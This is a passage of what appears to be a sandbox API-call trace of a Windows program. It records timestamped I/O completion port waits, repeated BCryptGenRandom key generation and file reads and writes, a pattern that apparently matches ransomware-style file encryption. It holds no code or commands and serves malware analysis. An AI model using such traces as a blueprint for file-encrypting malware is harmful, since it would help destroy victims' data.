lpOverlapped=0x35efc18) returned 1 [0082.338] CloseHandle (hObject=0x3b8) returned 1 [0082.338] free (_Block=0x2031ed0) [0082.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.356] ReadFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xc09, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0082.356] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.375] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.375] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0082.375] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.376] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0082.376] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.376] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.376] free (_Block=0x77d800) [0082.376] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.376] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.377] free (_Block=0x1ff1930) [0082.377] free (_Block=0x1ff1a40) [0082.377] free (_Block=0x77d908) [0082.377] WriteFile (in: hFile=0x3b8, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0082.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.541] CloseHandle (hObject=0x3b8) returned 1 [0082.541] free (_Block=0x1fb18c0) [0082.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.546] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.547] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0082.547] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.548] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0082.551] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.551] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.551] free (_Block=0x77d800) [0082.551] calloc (_Count=0x41, _Size=0x4) returned 0x2071f40 [0082.551] calloc (_Count=0x82, _Size=0x4) returned 0x2072050 [0082.552] free (_Block=0x2071f40) [0082.552] free (_Block=0x2072050) [0082.552] free (_Block=0x77d908) [0082.552] WriteFile (in: hFile=0x3b4, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0082.552] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.561] CloseHandle (hObject=0x3c4) returned 1 [0082.561] free (_Block=0x2031ed0) [0082.565] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.591] CloseHandle (hObject=0x3c4) returned 1 [0082.591] free (_Block=0x1fb18c0) [0082.591] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.601] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.602] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0082.602] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.603] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0082.607] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.607] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.607] free (_Block=0x77d800) [0082.607] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.607] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.607] free (_Block=0x1ff1930) [0082.607] free (_Block=0x1ff1a40) [0082.607] free (_Block=0x77d908) [0082.607] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.608] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.608] CloseHandle (hObject=0x3c0) returned 1 [0082.609] free (_Block=0x3d70048) [0082.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.613] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1170, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.626] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc04, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.626] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.626] CloseHandle (hObject=0x3c4) returned 1 [0082.627] free (_Block=0x1fb18c0) [0082.627] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.639] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.640] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0082.640] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.640] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0082.641] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.641] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.641] free (_Block=0x77d800) [0082.641] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.641] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.641] free (_Block=0x1ff1930) [0082.641] free (_Block=0x1ff1a40) [0082.641] free (_Block=0x77d908) [0082.642] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.642] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.647] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.647] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.651] CloseHandle (hObject=0x3c4) returned 1 [0082.651] free (_Block=0x1fb18c0) [0082.651] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.663] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.663] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0082.663] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.664] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0082.664] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.664] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.664] free (_Block=0x77d800) [0082.664] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.664] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.665] free (_Block=0x1ff1930) [0082.665] free (_Block=0x1ff1a40) [0082.665] free (_Block=0x77d908) [0082.665] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.665] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.670] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.670] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.673] CloseHandle (hObject=0x3c4) returned 1 [0082.673] free (_Block=0x1fb18c0) [0082.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.685] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.686] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0082.686] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.686] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0082.687] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.687] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.687] free (_Block=0x77d800) [0082.687] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.687] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.687] free (_Block=0x1ff1930) [0082.687] free (_Block=0x1ff1a40) [0082.687] free (_Block=0x77d908) [0082.687] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.688] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.689] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x11b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.689] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.705] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xbef, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.705] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.705] CloseHandle (hObject=0x3c4) returned 1 [0082.706] free (_Block=0x1fb18c0) [0082.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.743] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.743] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0082.743] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.744] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0082.744] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.744] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.744] free (_Block=0x77d800) [0082.744] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.744] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.745] free (_Block=0x1ff1930) [0082.745] free (_Block=0x1ff1a40) [0082.745] free (_Block=0x77d908) [0082.745] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.745] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.747] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x62a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.747] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.769] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x1b0a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.770] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.771] CloseHandle (hObject=0x3c4) returned 1 [0082.776] free (_Block=0x1fb18c0) [0082.776] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.788] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.788] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0082.789] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0082.789] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.789] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.789] free (_Block=0x77d800) [0082.789] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.789] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.790] free (_Block=0x1ff1930) [0082.790] free (_Block=0x1ff1a40) [0082.790] free (_Block=0x77d908) [0082.790] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.790] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.847] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0082.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.848] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.849] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0082.849] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.850] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0082.850] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.850] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.850] free (_Block=0x77d800) [0082.850] calloc (_Count=0x41, _Size=0x4) returned 0x3d70048 [0082.850] calloc (_Count=0x82, _Size=0x4) returned 0x3d70158 [0082.850] free (_Block=0x3d70048) [0082.850] free (_Block=0x3d70158) [0082.851] free (_Block=0x77d908) [0082.851] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.851] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.851] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.851] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.893] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc24, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.902] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0082.944] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.960] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x99, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0082.960] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0082.976] WriteFile (in: hFile=0x3b8, lpBuffer=0x3db00ec, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 0x0 [0082.976] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 